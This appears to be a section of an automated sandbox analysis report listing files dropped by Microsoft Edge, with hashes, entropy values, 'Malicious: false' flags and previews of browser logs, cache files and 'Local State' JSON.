File Type:	ASCII text
Category:	dropped
Size (bytes):	324
Entropy (8bit):	5.209795616844871
Encrypted:	false
SSDEEP:	6:HUtQYR+q2P923oH+TcwtfrK+IFUt8YUtT5GAWZmw+YUtT5G3VkwO923oH+TcwtfR:a+v4Yeb23FUt835GAW/+35G3V5LYeb3J
MD5:	2403DEE1690A3A3268FD105CE19BCA8C
SHA1:	543B178E13600FA6B5C1C43781BA86E743131483
SHA-256:	32217C13939FADB29C79B0CE45E39E8843C2E9C789268852B6A07616B9B2E1A2
SHA-512:	CD2E49BE59FC8BB64140211FA5B6A9D40CAB82FF618037E7BD7A45F55B45815C21BD7C32CD9F7590619B23D4353D13FEC8CB5F6981132C38CCCF0EF5A2BD36A1
Malicious:	false
Preview:	2024/11/13-14:39:37.305 1d3c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.2024/11/13-14:39:37.306 1d3c Recovering log #3.2024/11/13-14:39:37.306 1d3c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	324
Entropy (8bit):	5.209795616844871
Encrypted:	false
SSDEEP:	6:HUtQYR+q2P923oH+TcwtfrK+IFUt8YUtT5GAWZmw+YUtT5G3VkwO923oH+TcwtfR:a+v4Yeb23FUt835GAW/+35G3V5LYeb3J
MD5:	2403DEE1690A3A3268FD105CE19BCA8C
SHA1:	543B178E13600FA6B5C1C43781BA86E743131483
SHA-256:	32217C13939FADB29C79B0CE45E39E8843C2E9C789268852B6A07616B9B2E1A2
SHA-512:	CD2E49BE59FC8BB64140211FA5B6A9D40CAB82FF618037E7BD7A45F55B45815C21BD7C32CD9F7590619B23D4353D13FEC8CB5F6981132C38CCCF0EF5A2BD36A1
Malicious:	false
Preview:	2024/11/13-14:39:37.305 1d3c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.2024/11/13-14:39:37.306 1d3c Recovering log #3.2024/11/13-14:39:37.306 1d3c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	787
Entropy (8bit):	4.059252238767438
Encrypted:	false
SSDEEP:	12:G0nYUtTNop//z3p/Uz0RuWlJhC+lvBavRtin01zvZDEtlkyBrgxvB1ys:G0nYUtypD3RUovhC+lvBOL+t3IvB8s
MD5:	D8D8899761F621B63AD5ED6DF46D22FE
SHA1:	23E6A39058AB3C1DEADC0AF2E0FFD0D84BB7F1BE
SHA-256:	A5E0A78EE981FB767509F26021E1FA3C506F4E86860946CAC1DC4107EB3B3813
SHA-512:	4F89F556138C0CF24D3D890717EB82067C5269063C84229E93F203A22028782902FA48FB0154F53E06339F2FDBE35A985CE728235EA429D8D157090D25F15A4E
Malicious:	false
Preview:	.h.6.................__global... .t...................__global... .9..b.................33_..........................33_........v.................21_.....vuNX.................21_.....<...................20_.....,.1..................19_.....QL.s.................18_.....<.J\|.................37_...... .A.................38_..........................39_........].................20_.....Owa..................20_.....`..N.................19_.....D8.X.................18_......`...................37_..........................38_......\e..................39_.....dz.\|.................9_.....'\c..................9_.......f-.................__global... .\|.&R.................__global... ./....................__global... ..T...................__global... ...G..................__global... .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	342
Entropy (8bit):	5.1817676854558865
Encrypted:	false
SSDEEP:	6:HUt0oN+q2P923oH+TcwtfrzAdIFUt8YUt0omWZmw+YUtqRVkwO923oH+TcwtfrzS:K+v4Yeb9FUt8yW/+UV5LYeb2J
MD5:	4BDF6B1BF237B44CCAB0DAE35710A37D
SHA1:	661FF783795E6CEAFDE85B66E3C93F6135F7ECFD
SHA-256:	D2BE18A706C75B99A1359C76E7E4BCDF465404B0E1E23C90DF80A33CD2B3D268
SHA-512:	E081953D82C8C0F6B8A1E67A8BB8E1F8313ADFB1DE2AB20A00E429E7E28BAF5B74F53ED099F2909C5DE4F73CB3AA8DFF3C1F4382334A366337F00F45DD0230CB
Malicious:	false
Preview:	2024/11/13-14:39:37.293 1d3c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2024/11/13-14:39:37.293 1d3c Recovering log #3.2024/11/13-14:39:37.294 1d3c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	342
Entropy (8bit):	5.1817676854558865
Encrypted:	false
SSDEEP:	6:HUt0oN+q2P923oH+TcwtfrzAdIFUt8YUt0omWZmw+YUtqRVkwO923oH+TcwtfrzS:K+v4Yeb9FUt8yW/+UV5LYeb2J
MD5:	4BDF6B1BF237B44CCAB0DAE35710A37D
SHA1:	661FF783795E6CEAFDE85B66E3C93F6135F7ECFD
SHA-256:	D2BE18A706C75B99A1359C76E7E4BCDF465404B0E1E23C90DF80A33CD2B3D268
SHA-512:	E081953D82C8C0F6B8A1E67A8BB8E1F8313ADFB1DE2AB20A00E429E7E28BAF5B74F53ED099F2909C5DE4F73CB3AA8DFF3C1F4382334A366337F00F45DD0230CB
Malicious:	false
Preview:	2024/11/13-14:39:37.293 1d3c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2024/11/13-14:39:37.293 1d3c Recovering log #3.2024/11/13-14:39:37.294 1d3c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\uu_host_config

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	398313
Entropy (8bit):	4.953803318132309
Encrypted:	false
SSDEEP:	1536:veqeoyyQJztYNr3CZsTKsvbbOPlMa0JJoG3JfeX5B7FxRG0MZ/d18bfpyvFaRnxY:q7JVZb0JOGiMldObbFG/eFd2X134a
MD5:	4529A95302CDD7EF2BB39E087A5E8DF6
SHA1:	6449A1AAEF5A5BBF798FF0FFF1BB51F5150FD578
SHA-256:	A41F5D82CF139CB1C29E91EE45A873B98879971E5E5552CC3B903EB8FE1CF658
SHA-512:	B314C5434D903E0472C7A1E02E958DE7DC68C7FE44CAC3486B98C48BB057E6263EC6EF00A1CCC186FC6CD3240EC2D62C73D091975B669ACE7D978AB65A670318
Malicious:	false
Preview:	{. "0123movies.com": "{\"Tier1\": [983, 6061], \"Tier2\": [4948, 1106, 9972]}",. "1020398.app.netsuite.com": "{\"Tier1\": [6061, 8405, 5938], \"Tier2\": [228, 236]}",. "1337x.to": "{\"Tier1\": [6061, 983], \"Tier2\": [6657, 475, 4068]}",. "2cvresearch.decipherinc.com": "{\"Tier1\": [8405], \"Tier2\": [379, 6101]}",. "3817341.extforms.netsuite.com": "{\"Tier1\": [6061, 8405, 5938], \"Tier2\": [7746]}",. "3cx.integrafin.co.uk": "{\"Tier1\": [8405, 6061], \"Tier2\": [2863, 5391]}",. "4540582.extforms.netsuite.com": "{\"Tier1\": [8405], \"Tier2\": [228, 236, 7746]}",. "7589.directpaper.name": "{\"Tier1\": [8405], \"Tier2\": []}",. "7a201srvitportl.cymru.nhs.uk": "{\"Tier1\": [], \"Tier2\": [9870]}",. "7a3cjsvmifitla1.cymru.nhs.uk": "{\"Tier1\": [6061], \"Tier2\": [1092]}",. "7a3cjsvmlivwebb.cymru.nhs.uk": "{\"Tier1\": [148, 6061], \"Tier2\": [9870, 9813]}",. "8ballpool.com": "{\"Tier1\": [8741, 3907, 983], \"Tier2\": [9151, 5779, 6916]}",. "9anime.gs"

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\data_1

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	270336
Entropy (8bit):	0.0018238520723782249
Encrypted:	false
SSDEEP:	3:MsEllllkEthXllkl2zETlCxgu/:/M/xT02zdf/
MD5:	CBEC0A9E989B64FA6731ACFB880D2525
SHA1:	D7E0F035C78B07EF8CC705C55A6BEB0132967D88
SHA-256:	1BADBE3776D19EA6AA505AE7FD4D7E5AA3D137C2177B83B4F6A9A52117DB86CB
SHA-512:	6F573D9868D415D77F27964597EE22326268D375BD6005BBA4E735107051FA5CC587CA5B02E9A0887320C9AB25EE77603D3CB669177F7D43166F30710E9964F6
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\GraphiteDawnCache\data_1

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	270336
Entropy (8bit):	0.0018238520723782249
Encrypted:	false
SSDEEP:	3:MsEllllkEthXllkl2zETlJtp/:/M/xT02zmf/
MD5:	82A6AB2099B9DFF04F732F3065C73232
SHA1:	5214EB18BDE1BBC14585160ECC97CEAFD1C94CF0
SHA-256:	D7E99F6A50F6D58764083B3945C1507E7A0DEA6A93A2041EDF04DEF403F94EE7
SHA-512:	198A8940D704CCBF97C3BCD77945F0B470C708BDCFB24F5B4303816FD39B8022A7953E3B98F4E5B9F2B9168405F863858958901689ABA06C1ED4EEB9D2C04AA9
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Last Browser

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	120
Entropy (8bit):	3.32524464792714
Encrypted:	false
SSDEEP:	3:tbloIlrJFlXnpQoWcNylRjlgbYnPdJiG6R7lZAUAl:tbdlrYoWcV0n1IGi7kBl
MD5:	A397E5983D4A1619E36143B4D804B870
SHA1:	AA135A8CC2469CFD1EF2D7955F027D95BE5DFBD4
SHA-256:	9C70F766D3B84FC2BB298EFA37CC9191F28BEC336329CC11468CFADBC3B137F4
SHA-512:	4159EA654152D2810C95648694DD71957C84EA825FCCA87B36F7E3282A72B30EF741805C610C5FA847CA186E34BDE9C289AAA7B6931C5B257F1D11255CD2A816
Malicious:	false
Preview:	C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t.\.E.d.g.e.\.A.p.p.l.i.c.a.t.i.o.n.\.m.s.e.d.g.e...e.x.e.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Last Version

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	13
Entropy (8bit):	2.7192945256669794
Encrypted:	false
SSDEEP:	3:NYLFRQI:ap2I
MD5:	BF16C04B916ACE92DB941EBB1AF3CB18
SHA1:	FA8DAEAE881F91F61EE0EE21BE5156255429AA8A
SHA-256:	7FC23C9028A316EC0AC25B09B5B0D61A1D21E58DFCF84C2A5F5B529129729098
SHA-512:	F0B7DF5517596B38D57C57B5777E008D6229AB5B1841BBE74602C77EEA2252BF644B8650C7642BD466213F62E15CC7AB5A95B28E26D3907260ED1B96A74B65FB
Malicious:	false
Preview:	117.0.2045.47

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44137
Entropy (8bit):	6.090726580610927
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4kkBMWwuF9hDO6vP6O+/tbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEA6Stbz8hu3VlXr4CRo1
MD5:	041E41530EB800BD60DC720B114C723A
SHA1:	79D96B00B4D90BB3BB078705B95D37FED7ACE751
SHA-256:	FF687872F0B0B1253D3A81420CF0A4973573B87BCBA3E97B04E93410A181690E
SHA-512:	04C9F53FDD3512A44A8B691D1ABAE7D4239131F1CE77D972FFAABF71010E5EB4380E627CF7D271BE0228CBF57EAAF28BE3F8F05335F93166C8B2E09967BFC615
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF3a077.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44137
Entropy (8bit):	6.090726580610927
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4kkBMWwuF9hDO6vP6O+/tbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEA6Stbz8hu3VlXr4CRo1
MD5:	041E41530EB800BD60DC720B114C723A
SHA1:	79D96B00B4D90BB3BB078705B95D37FED7ACE751
SHA-256:	FF687872F0B0B1253D3A81420CF0A4973573B87BCBA3E97B04E93410A181690E
SHA-512:	04C9F53FDD3512A44A8B691D1ABAE7D4239131F1CE77D972FFAABF71010E5EB4380E627CF7D271BE0228CBF57EAAF28BE3F8F05335F93166C8B2E09967BFC615
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF3a087.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44137
Entropy (8bit):	6.090726580610927
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4kkBMWwuF9hDO6vP6O+/tbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEA6Stbz8hu3VlXr4CRo1
MD5:	041E41530EB800BD60DC720B114C723A
SHA1:	79D96B00B4D90BB3BB078705B95D37FED7ACE751
SHA-256:	FF687872F0B0B1253D3A81420CF0A4973573B87BCBA3E97B04E93410A181690E
SHA-512:	04C9F53FDD3512A44A8B691D1ABAE7D4239131F1CE77D972FFAABF71010E5EB4380E627CF7D271BE0228CBF57EAAF28BE3F8F05335F93166C8B2E09967BFC615
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF3a21d.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44137
Entropy (8bit):	6.090726580610927
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4kkBMWwuF9hDO6vP6O+/tbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEA6Stbz8hu3VlXr4CRo1
MD5:	041E41530EB800BD60DC720B114C723A
SHA1:	79D96B00B4D90BB3BB078705B95D37FED7ACE751
SHA-256:	FF687872F0B0B1253D3A81420CF0A4973573B87BCBA3E97B04E93410A181690E
SHA-512:	04C9F53FDD3512A44A8B691D1ABAE7D4239131F1CE77D972FFAABF71010E5EB4380E627CF7D271BE0228CBF57EAAF28BE3F8F05335F93166C8B2E09967BFC615
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF3c92d.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44137
Entropy (8bit):	6.090726580610927
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4kkBMWwuF9hDO6vP6O+/tbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEA6Stbz8hu3VlXr4CRo1
MD5:	041E41530EB800BD60DC720B114C723A
SHA1:	79D96B00B4D90BB3BB078705B95D37FED7ACE751
SHA-256:	FF687872F0B0B1253D3A81420CF0A4973573B87BCBA3E97B04E93410A181690E
SHA-512:	04C9F53FDD3512A44A8B691D1ABAE7D4239131F1CE77D972FFAABF71010E5EB4380E627CF7D271BE0228CBF57EAAF28BE3F8F05335F93166C8B2E09967BFC615
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF4022f.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44137
Entropy (8bit):	6.090726580610927
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4kkBMWwuF9hDO6vP6O+/tbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEA6Stbz8hu3VlXr4CRo1
MD5:	041E41530EB800BD60DC720B114C723A
SHA1:	79D96B00B4D90BB3BB078705B95D37FED7ACE751
SHA-256:	FF687872F0B0B1253D3A81420CF0A4973573B87BCBA3E97B04E93410A181690E
SHA-512:	04C9F53FDD3512A44A8B691D1ABAE7D4239131F1CE77D972FFAABF71010E5EB4380E627CF7D271BE0228CBF57EAAF28BE3F8F05335F93166C8B2E09967BFC615
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF4b310.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44137
Entropy (8bit):	6.090726580610927
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4kkBMWwuF9hDO6vP6O+/tbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEA6Stbz8hu3VlXr4CRo1
MD5:	041E41530EB800BD60DC720B114C723A
SHA1:	79D96B00B4D90BB3BB078705B95D37FED7ACE751
SHA-256:	FF687872F0B0B1253D3A81420CF0A4973573B87BCBA3E97B04E93410A181690E
SHA-512:	04C9F53FDD3512A44A8B691D1ABAE7D4239131F1CE77D972FFAABF71010E5EB4380E627CF7D271BE0228CBF57EAAF28BE3F8F05335F93166C8B2E09967BFC615
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06u